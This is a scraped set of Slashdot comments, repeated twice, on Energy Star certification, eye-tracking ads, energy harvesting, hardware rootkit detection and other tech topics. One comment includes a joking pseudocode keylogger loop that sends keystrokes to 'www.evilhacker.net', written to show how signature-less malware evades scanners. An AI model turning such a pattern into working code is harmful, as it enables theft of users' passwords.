...it was not the EPA's job to evaluate the legitimacy of companies and their legitimacy-proving paperworks (DBA filings, articles of incorporation, etc.), nor make value judgments on the market demand for their products. We already have other government offices for that. Sounds like they grant Energy Star certs on a "self-report and spot-check" basis, which is unfortunate, but not at all uncommon (think GSA, many FCC certified device classes, the Census, your income tax...). If the GAO or those reporting on this are of the belief (as maybe they should be) that self-reporting is not the way to go, they probably need to change the rules to require testing by independent labs, as the FCC does with intentional radiators (radios). Focusing on the fact that they approved "illegitimate companies" or laughable products seems to be missing the point.
(For what it's worth, the "ordinary space heater with a featherduster attached" didn't seem much further out there than some ACTUAL, marketed products in this segment. There are plenty of shady companies out there happy to separate fools from their money, but again, it's the FTC, not the EPA, who is in charge of cracking down on them.)
Unimportant words also fade out while you're skimming the text, and ads automatically appears if you glance away. It can pronounce the words you're reading, and reading certain words can trigger the appearance of ads or even video ads, noisy ads or noisy video ads, almost like the truly interactive ads in Minority Report. 'With the help of an eye tracker, Text 2.0 follows your progress and presents tampon ads just in time,' the researchers explain in a video.
Or where they put the blinky ads. I find them extremely distracting, so I intentionally scroll them as far off-screen as possible, and keep them there as long as possible. So I might keep my reading at the 1st visible line of the page ('til the top blinky is gone), then quit scrolling 'til I hit the very bottom because another is lurking just below the fold. So the approach may not work for everyone:-)
PS. Sadly, I've also pretty much stopped mouse-highlighting poorly-contrasting text as I read it ever since all the web marketers of the world decided triggering fly-around-the-page-and-make-noise crap onMouseDown was clever.
"Worse, YouTube founder Karim once uploaded infringing content."
Hey, we get it - there were some emails from the early days of YouTube that make clear that they (pre-Google) were aware of copyrighted videos on the site, and decided on a case-by-case basis what to do about them (delete immediately, delete in a couple weeks when a viral traffic spike dies down, wait until someone formally complains). But was it ever ruled that any of these videos were actually infringing (and not e.g. fake-leaked videos by an authorized marketing company, or fair use)?
Scenario: Karim copies a 15-second CNN 'oops' clip in which a reporter's pants fall down during a live interview, from Break.com, or the early-youtube equivalent of Fail Blog, etc. Obviously, CNN has copyright ownership in it, maybe a lawyer could argue early-failblog has some derivative-work interest in it somehow (an early-failblog watermark stamped into the corner). But whether this is actual infringement, and to whom, is a matter only the court can decide. Until such a decision, I don't see how the "incriminating" Youtube emails are worth the paper they're printed on as proof of wrongdoing.
You're correct. The amount of energy conveyed in typical ambient sound waves is VANISHINGLY small. I work at a company that does, among other things, piezoelectrics for conventional (non-hydrogen) energy harvesting. It's certainly interesting work, but selling Free Energy in any quantity attracts occasional kooks and customers without much backing in thermodynamics or science in general. Kinda like all those over the years who have had the idea to put a kinetic generator inside a cellphone/iPod/palmpilot type device (despite the Nokia patent recently covered on/., which mainly covers a specific construction of the device using the battery as a proof mass, the idea is not exactly new) - enjoy your 2.2 seconds of additional talk time:-)
Getting back on topic... my favorite was someone who phoned up to discuss a piezo-based sound energy harvester for a phone. Their idea was to power/recharge the phone using only the power provided by the user's voice. You could even harvest the remote caller's noise from the speaker! Then the phone would never need recharging, as long as the user made enough calls to keep it charged...
I read a very interesting paper a few years back on a hardware-based rootkit detection method that could operate beneath the level of anything that might interfere with it (hooked/replaced OS components, hypervisors, etc.) The basic idea was to use a PCI/PCIe card with its own small, cheap processor (like most wireless cards have today...or non-"Win" modems of yesterday) to slowly scan through system memory by issuing DMA transfers. This is occuring at the naked hardware level (the CPU is not even involved in these transfers, the chipset does all the work), making it theoretically immune to any software-level shenanigans. You would not even have to halt anything to perform the scan.
Granted, there is some cost and a mild performance hit to adding the extra hardware, but many of the top 'targets' (banks, the DoD) would not really flinch at it.
But why bother trying to figure out where its keys are stored, just NOP over the scanner's entire memory space:-) It seems to me that if this all-powerful scanner has the power to arbitrarily swap out ALL other processes (including, presumably, the OS it runs in), shouldn't it have the power to pre-empt their threads during this process? And if not--that is, if it's letting these baddies dance all over RAM even as it scans, how does it guarantee that its own address space can't be danced on?
Why would a malware necessarily delete a hunk of another process and inject itself there? We may be operating on different definitions of malware.
The article assumes a very advanced, very nasty piece of work. The kind that can drop their own hypervisors, outwit the memory manager, write a firmware upate to your PCI netcard to periodically DMA bytes of badstuff over process memory right behind the OS' back, etc. But the typical things I am cleaning from machines are just an executable that convinced some dummy to click on it.
(* Evil Crap Compiler, (c) 2010 the Evil Foundation)
Your (very) basic run-of-the mill badware, no memory shenanigans. I make one copy and email it to one well-chosen dummy whose password I want. In other words, there's not a signature on file for it. How does the article's superscanner know it's bad?
(As you've parroted many times in prior threads, "it has a memory footprint", but so does Firefox.exe.)
If you started with a known-clean machine, why scan for malware? From the point of first switch-on of the "clean" machine and initial scan, there is still a live user at the helm, running programs, and (gasp!) maybe even downloading and voluntarily running new ones. (They paid for the machine after all, so why not?) In other words, constantly changing the memory footprint. The article's solution seems to assume that all malware actively dodges the scanner and the system has no users. Although, even on a dedicated server, processes are normally spawning and terminating all the time. If the spawning-and-terminating processes aren't actively evading swap, how does the scanner tell the 'good' processes from the 'bad' ones? The usual...signatures...heuristics (guessing)...etc. Exactly the things the article is entirely premised on "solving".
Depends on the size of the project. I haven't worked on any large-scale projects, so I can only really give a perspective from one-man itchscratch programs to those with a dev team of 3 or so... my least favorite parts:
1) Documentation I write it, and try to make it informative, but...people don't read it. Certainly some do, but there is that percentage who quit reading (and start emailing you questions that are answered in the friendly manual) because the documentation is too technical, and that other percentage who quit reading at the 3rd page because it isn't technical enough. And you also have to assume some minimum level of proficiency for you user/implementor, which is just a guess at best (and the skill level of the userbase may change dramatically as the project progresses or it gains popularity/promotion in specific circles, think "featured on AOL News"). You can't really include an entire semester of CS101 in your documentation. Not even to mention all the users that cry at you because they speak a language you don't, and you haven't provided a Turkish/etc. version.
Which leads into... 2) Tech Support I don't just mean the emails from users who didn't/couldn't RTFM (you can use the delete button for this, at the expense of disgruntled users publicly slamming your project/self/lineage), but the gruntwork of providing support infrastructure. Somebody's gotta keep on top of the spammers in the forums and wiki you set up. Somebody's got to keep up with the patches / security advisories on them, and clean up the mess when they get hacked. Somebody's got to staff the IRC channel, if applicable.
3) PR Of course, if you don't stop coding and start pumping the project, nobody's going to know about it. Who is a great coder, excellent technical writer AND a people person? Or marketing person, for that matter. This might well be my least favorite task.
No disagreement that the practice is rotten, harmful and does not produce any useful product (i.e. add value). (Isn't that what finance people do all the time, as their day job?) But does/should that in itself make the practice unlawful?
Playing devil's advocate here, I go to a garage sale and score an original Rembrandt painting for $25 from a little old lady who doesn't realize its true market value. I now own 100% of the world's supply of this particular painting (as there is only one). I put it up for sale at $10 million. Am I a criminal?
Insubordination (n): That thing an authority figure busts you for when they have nothing to bust you for. (See also: Disturbing The Peace, Resisting Arrest, Insulting An Officer)
Although, from the 2nd Kotaku article...
"The Company is concluding an internal human resources inquiry into breaches of contract and insubordination by two senior employees at Infinity Ward," Acitivsion states in a filing with the U.S. Securities and Exchange Commission. "This matter is expected to involve the departure of key personnel and litigation. At present, the Company does not expect this matter to have a material impact on the Company."
Raises the possibility that there is more afoot than a simple pissing contest between egomaniacs. Although the SEC filing blurb does not elaborate on who they expect to sue whom.
It also assumes the user started using Windows after the point where this began to work (after the 100th failed attempt in Win95/98/NT, who keeps trying that?), and that the user thinks to try copying text from a non-textbox, and that the messagebox isn't being rendered by something other than WinAPI2k+ (non-WinAPI GUI toolkits, Borland VCL, qt?, gtk?, java?....)
My parents' first computer was a Macintosh SE. On it (System 6?), crashes were usually announced by a nondescript error message accompanied by a picture of a bomb with a lit fuse. When they saw this message (they referred to it as the 'time bomb'), they raced to switch off the machine, thinking the lit-bomb graphic was meant to imply that the problem could grow worse the longer the machine was left in this state.
Moral: Don't make the error messages too intimidating. Especially go out of your way to avoid helping the user conclude that the error messages/condition is 'dangerous' (unless it really, really is) or that "making it go away ASAP" is their safest option.
If you RTFA, the test they constructed was designed to mimic the warm/cool cycles the phone would experience on its way to retail and after you drop it off for warranty repairs:
The first "freezing" in the way of the client to the salon operator, then the phone goes on the shelf in the warehouse, where is "thawed". Nastpnie kolejne mroenie” w drodze z salonu do centrali firmy kurierskiej i znowu rozmraanie” na póce w magazynie. Then another "freezing" in the way of living to the headquarters by courier service, and again, "defrost" on a shelf in the store. Na koniec trzecie mroenie” w drodze z centrali kurierskiej do serwisu Regenersis. At the end of the third "freezing" on the road from headquarters to the courier service Regenersis.
So what they suggest is it is entirely possible to be denied warranty service for "red dots", even if the customer never operated it outside the recommended operating conditions, due to excursions during shipping to the repair facility. Whether the recommended operating conditions are at all sane for real-world usage (i.e. "mobile" phone, "fitness for purpose" warranty clause), or whether the ROC correlate 1:1 to the terms of the warranty are other kettles of fish entirely.
You mean we are getting scammed buying bottles of DI water for the electronics lab?;-)
There are probably urban legends out there claiming pure water is the universe's most potent insulator, but the fact is pure water is a poor enough conductor that it would not always cause undesired operation, and rarely catastrophic damage in the short term. Consumer electronics DO get repeatedly exposed to 'water' in the form of condensation films, and are expected to handle them gracefully - not to mention in combination with dust and lint particles, cigarette smoke residue, pet hairs, and for self-installed electronics, finger oils as well (how many swab that new videocard down with alcohol after installing it, even though their fingerprints are all over it?) Under ideal circumstances, a well-cleaned circuit board may have 20Mohms resistance between adjacent pads, but this can drop rapidly in some real-world usage scenarios.
In any case, the reason a fishtank full of distilled water is not a good idea for keeping your motherboard cooled, is that distilled water doesn't stay distilled for long, particularly when immersing a big collection of soluble contaminants and metals into it. High conductivity will hurt the gadget now; corrosion will hurt the gadget later. The GP has it right - if a gadget takes a dunk, *immediately* pull the batteries, then give it another bath - in distilled water, to remove corrosive contaminants - and dry very thoroughly (days).
Ironically, most modern ("eco") solder flux is designed to be water-soluble; dunking completed PCB assemblies in distilled water is a standard manufacturing step.
Figuring out if a program/function completes in O(n), O(n^2) or O(c^n) time is something that anyone with a basic understanding of loops and jr high math could do.
Or a stopwatch:-)
Regarding hex, it depends on the type of programming. I'm an embedded systems developer (various mixes of C and assembler for 8- and 16-bit microcontroller driven gadgets, plus enough PC-side coding as required to talk to the gadget); I use/require hex notation liberally in my day-to-day coding. Some specific cases this comes in handy are bitwise operations (AND, OR, XOR, etc.) and many operations which operate against a mask (e.g. addressing specific bits in a register, constraining the value of a variable, translating variable formats, parsing data from a binary file), or where the requirements/documentation from your upstream application follow hex notation (e.g. the entire documentation of the FAT12/16/32 file system). It's a much more efficient and mentally "clear" way of thinking of the organization of data in the computer's memory. (Yes, some languages e.g. Java go to great pains to forcibly isolate the coder from the underlying implementation of what they have coded, but where efficiency counts at all, understanding of the underlying details is important!)
Slashdot Mirror
Webcast? Webcast?
Get with the times man, the uncool kids are calling them 'webinars' now.
...it was not the EPA's job to evaluate the legitimacy of companies and their legitimacy-proving paperworks (DBA filings, articles of incorporation, etc.), nor make value judgments on the market demand for their products. We already have other government offices for that. Sounds like they grant Energy Star certs on a "self-report and spot-check" basis, which is unfortunate, but not at all uncommon (think GSA, many FCC certified device classes, the Census, your income tax...). If the GAO or those reporting on this are of the belief (as maybe they should be) that self-reporting is not the way to go, they probably need to change the rules to require testing by independent labs, as the FCC does with intentional radiators (radios). Focusing on the fact that they approved "illegitimate companies" or laughable products seems to be missing the point.
(For what it's worth, the "ordinary space heater with a featherduster attached" didn't seem much further out there than some ACTUAL, marketed products in this segment. There are plenty of shady companies out there happy to separate fools from their money, but again, it's the FTC, not the EPA, who is in charge of cracking down on them.)
You'd pass by a date with GLaDOS for THAT?!
Unimportant words also fade out while you're skimming the text, and ads automatically appears if you glance away. It can pronounce the words you're reading, and reading certain words can trigger the appearance of ads or even video ads, noisy ads or noisy video ads, almost like the truly interactive ads in Minority Report. 'With the help of an eye tracker, Text 2.0 follows your progress and presents tampon ads just in time,' the researchers explain in a video.
Fixed that for you.
Or where they put the blinky ads. I find them extremely distracting, so I intentionally scroll them as far off-screen as possible, and keep them there as long as possible. So I might keep my reading at the 1st visible line of the page ('til the top blinky is gone), then quit scrolling 'til I hit the very bottom because another is lurking just below the fold. So the approach may not work for everyone :-)
PS. Sadly, I've also pretty much stopped mouse-highlighting poorly-contrasting text as I read it ever since all the web marketers of the world decided triggering fly-around-the-page-and-make-noise crap onMouseDown was clever.
"Worse, YouTube founder Karim once uploaded infringing content."
Hey, we get it - there were some emails from the early days of YouTube that make clear that they (pre-Google) were aware of copyrighted videos on the site, and decided on a case-by-case basis what to do about them (delete immediately, delete in a couple weeks when a viral traffic spike dies down, wait until someone formally complains). But was it ever ruled that any of these videos were actually infringing (and not e.g. fake-leaked videos by an authorized marketing company, or fair use)?
Scenario: Karim copies a 15-second CNN 'oops' clip in which a reporter's pants fall down during a live interview, from Break.com, or the early-youtube equivalent of Fail Blog, etc. Obviously, CNN has copyright ownership in it, maybe a lawyer could argue early-failblog has some derivative-work interest in it somehow (an early-failblog watermark stamped into the corner). But whether this is actual infringement, and to whom, is a matter only the court can decide. Until such a decision, I don't see how the "incriminating" Youtube emails are worth the paper they're printed on as proof of wrongdoing.
You're correct. The amount of energy conveyed in typical ambient sound waves is VANISHINGLY small. I work at a company that does, among other things, piezoelectrics for conventional (non-hydrogen) energy harvesting. It's certainly interesting work, but selling Free Energy in any quantity attracts occasional kooks and customers without much backing in thermodynamics or science in general. Kinda like all those over the years who have had the idea to put a kinetic generator inside a cellphone/iPod/palmpilot type device (despite the Nokia patent recently covered on /., which mainly covers a specific construction of the device using the battery as a proof mass, the idea is not exactly new) - enjoy your 2.2 seconds of additional talk time :-)
Getting back on topic... my favorite was someone who phoned up to discuss a piezo-based sound energy harvester for a phone. Their idea was to power/recharge the phone using only the power provided by the user's voice. You could even harvest the remote caller's noise from the speaker! Then the phone would never need recharging, as long as the user made enough calls to keep it charged...
I read a very interesting paper a few years back on a hardware-based rootkit detection method that could operate beneath the level of anything that might interfere with it (hooked/replaced OS components, hypervisors, etc.) The basic idea was to use a PCI/PCIe card with its own small, cheap processor (like most wireless cards have today...or non-"Win" modems of yesterday) to slowly scan through system memory by issuing DMA transfers. This is occuring at the naked hardware level (the CPU is not even involved in these transfers, the chipset does all the work), making it theoretically immune to any software-level shenanigans. You would not even have to halt anything to perform the scan.
Granted, there is some cost and a mild performance hit to adding the extra hardware, but many of the top 'targets' (banks, the DoD) would not really flinch at it.
Very true!
But why bother trying to figure out where its keys are stored, just NOP over the scanner's entire memory space :-) It seems to me that if this all-powerful scanner has the power to arbitrarily swap out ALL other processes (including, presumably, the OS it runs in), shouldn't it have the power to pre-empt their threads during this process? And if not--that is, if it's letting these baddies dance all over RAM even as it scans, how does it guarantee that its own address space can't be danced on?
Why would a malware necessarily delete a hunk of another process and inject itself there? We may be operating on different definitions of malware.
The article assumes a very advanced, very nasty piece of work. The kind that can drop their own hypervisors, outwit the memory manager, write a firmware upate to your PCI netcard to periodically DMA bytes of badstuff over process memory right behind the OS' back, etc. But the typical things I am cleaning from machines are just an executable that convinced some dummy to click on it.
while(String[] a=keysPressed())
{
socket_write('www.evilhacker.net', a);
}
ecc* -o baddie.exe
(* Evil Crap Compiler, (c) 2010 the Evil Foundation)
Your (very) basic run-of-the mill badware, no memory shenanigans. I make one copy and email it to one well-chosen dummy whose password I want. In other words, there's not a signature on file for it. How does the article's superscanner know it's bad?
(As you've parroted many times in prior threads, "it has a memory footprint", but so does Firefox.exe.)
If you started with a known-clean machine, why scan for malware? From the point of first switch-on of the "clean" machine and initial scan, there is still a live user at the helm, running programs, and (gasp!) maybe even downloading and voluntarily running new ones. (They paid for the machine after all, so why not?) In other words, constantly changing the memory footprint. The article's solution seems to assume that all malware actively dodges the scanner and the system has no users. Although, even on a dedicated server, processes are normally spawning and terminating all the time. If the spawning-and-terminating processes aren't actively evading swap, how does the scanner tell the 'good' processes from the 'bad' ones? The usual...signatures...heuristics (guessing)...etc. Exactly the things the article is entirely premised on "solving".
Depends on the size of the project. I haven't worked on any large-scale projects, so I can only really give a perspective from one-man itchscratch programs to those with a dev team of 3 or so... my least favorite parts:
1) Documentation
I write it, and try to make it informative, but...people don't read it. Certainly some do, but there is that percentage who quit reading (and start emailing you questions that are answered in the friendly manual) because the documentation is too technical, and that other percentage who quit reading at the 3rd page because it isn't technical enough. And you also have to assume some minimum level of proficiency for you user/implementor, which is just a guess at best (and the skill level of the userbase may change dramatically as the project progresses or it gains popularity/promotion in specific circles, think "featured on AOL News"). You can't really include an entire semester of CS101 in your documentation. Not even to mention all the users that cry at you because they speak a language you don't, and you haven't provided a Turkish/etc. version.
Which leads into...
2) Tech Support
I don't just mean the emails from users who didn't/couldn't RTFM (you can use the delete button for this, at the expense of disgruntled users publicly slamming your project/self/lineage), but the gruntwork of providing support infrastructure. Somebody's gotta keep on top of the spammers in the forums and wiki you set up. Somebody's got to keep up with the patches / security advisories on them, and clean up the mess when they get hacked. Somebody's got to staff the IRC channel, if applicable.
3) PR
Of course, if you don't stop coding and start pumping the project, nobody's going to know about it. Who is a great coder, excellent technical writer AND a people person? Or marketing person, for that matter. This might well be my least favorite task.
If so, it means it's a patent application he's "thinking about" but hasn't actually filed yet.
He already said internet access.
I assume the 230Mb/s is for stuff like delivering digital video to your TV without plugging cables.
"Wow, this movie looks even better in digital!"
"Here, let me turn the lights out so we can wa...oh."
Granted they have to update it a bit for LCD, but...
http://en.wikipedia.org/wiki/NES_Zapper
No disagreement that the practice is rotten, harmful and does not produce any useful product (i.e. add value). (Isn't that what finance people do all the time, as their day job?) But does/should that in itself make the practice unlawful?
Playing devil's advocate here, I go to a garage sale and score an original Rembrandt painting for $25 from a little old lady who doesn't realize its true market value. I now own 100% of the world's supply of this particular painting (as there is only one). I put it up for sale at $10 million. Am I a criminal?
Insubordination (n): That thing an authority figure busts you for when they have nothing to bust you for. (See also: Disturbing The Peace, Resisting Arrest, Insulting An Officer)
Although, from the 2nd Kotaku article...
"The Company is concluding an internal human resources inquiry into breaches of contract and insubordination by two senior employees at Infinity Ward," Acitivsion states in a filing with the U.S. Securities and Exchange Commission. "This matter is expected to involve the departure of key personnel and litigation. At present, the Company does not expect this matter to have a material impact on the Company."
Raises the possibility that there is more afoot than a simple pissing contest between egomaniacs. Although the SEC filing blurb does not elaborate on who they expect to sue whom.
Sometimes.
It also assumes the user started using Windows after the point where this began to work (after the 100th failed attempt in Win95/98/NT, who keeps trying that?), and that the user thinks to try copying text from a non-textbox, and that the messagebox isn't being rendered by something other than WinAPI2k+ (non-WinAPI GUI toolkits, Borland VCL, qt?, gtk?, java?....)
My parents' first computer was a Macintosh SE. On it (System 6?), crashes were usually announced by a nondescript error message accompanied by a picture of a bomb with a lit fuse. When they saw this message (they referred to it as the 'time bomb'), they raced to switch off the machine, thinking the lit-bomb graphic was meant to imply that the problem could grow worse the longer the machine was left in this state.
Moral: Don't make the error messages too intimidating. Especially go out of your way to avoid helping the user conclude that the error messages/condition is 'dangerous' (unless it really, really is) or that "making it go away ASAP" is their safest option.
Cool! This reminds me of John Maushammer's Pong Watch.
To hear most parents talk, any masturbation will soon enough become a double-blind study.
If you RTFA, the test they constructed was designed to mimic the warm/cool cycles the phone would experience on its way to retail and after you drop it off for warranty repairs:
The first "freezing" in the way of the client to the salon operator, then the phone goes on the shelf in the warehouse, where is "thawed". Nastpnie kolejne mroenie” w drodze z salonu do centrali firmy kurierskiej i znowu rozmraanie” na póce w magazynie. Then another "freezing" in the way of living to the headquarters by courier service, and again, "defrost" on a shelf in the store. Na koniec trzecie mroenie” w drodze z centrali kurierskiej do serwisu Regenersis. At the end of the third "freezing" on the road from headquarters to the courier service Regenersis.
So what they suggest is it is entirely possible to be denied warranty service for "red dots", even if the customer never operated it outside the recommended operating conditions, due to excursions during shipping to the repair facility. Whether the recommended operating conditions are at all sane for real-world usage (i.e. "mobile" phone, "fitness for purpose" warranty clause), or whether the ROC correlate 1:1 to the terms of the warranty are other kettles of fish entirely.
You mean we are getting scammed buying bottles of DI water for the electronics lab? ;-)
There are probably urban legends out there claiming pure water is the universe's most potent insulator, but the fact is pure water is a poor enough conductor that it would not always cause undesired operation, and rarely catastrophic damage in the short term. Consumer electronics DO get repeatedly exposed to 'water' in the form of condensation films, and are expected to handle them gracefully - not to mention in combination with dust and lint particles, cigarette smoke residue, pet hairs, and for self-installed electronics, finger oils as well (how many swab that new videocard down with alcohol after installing it, even though their fingerprints are all over it?) Under ideal circumstances, a well-cleaned circuit board may have 20Mohms resistance between adjacent pads, but this can drop rapidly in some real-world usage scenarios.
In any case, the reason a fishtank full of distilled water is not a good idea for keeping your motherboard cooled, is that distilled water doesn't stay distilled for long, particularly when immersing a big collection of soluble contaminants and metals into it. High conductivity will hurt the gadget now; corrosion will hurt the gadget later. The GP has it right - if a gadget takes a dunk, *immediately* pull the batteries, then give it another bath - in distilled water, to remove corrosive contaminants - and dry very thoroughly (days).
Ironically, most modern ("eco") solder flux is designed to be water-soluble; dunking completed PCB assemblies in distilled water is a standard manufacturing step.
Figuring out if a program/function completes in O(n), O(n^2) or O(c^n) time is something that anyone with a basic understanding of loops and jr high math could do.
Or a stopwatch :-)
Regarding hex, it depends on the type of programming. I'm an embedded systems developer (various mixes of C and assembler for 8- and 16-bit microcontroller driven gadgets, plus enough PC-side coding as required to talk to the gadget); I use/require hex notation liberally in my day-to-day coding. Some specific cases this comes in handy are bitwise operations (AND, OR, XOR, etc.) and many operations which operate against a mask (e.g. addressing specific bits in a register, constraining the value of a variable, translating variable formats, parsing data from a binary file), or where the requirements/documentation from your upstream application follow hex notation (e.g. the entire documentation of the FAT12/16/32 file system). It's a much more efficient and mentally "clear" way of thinking of the organization of data in the computer's memory. (Yes, some languages e.g. Java go to great pains to forcibly isolate the coder from the underlying implementation of what they have coded, but where efficiency counts at all, understanding of the underlying details is important!)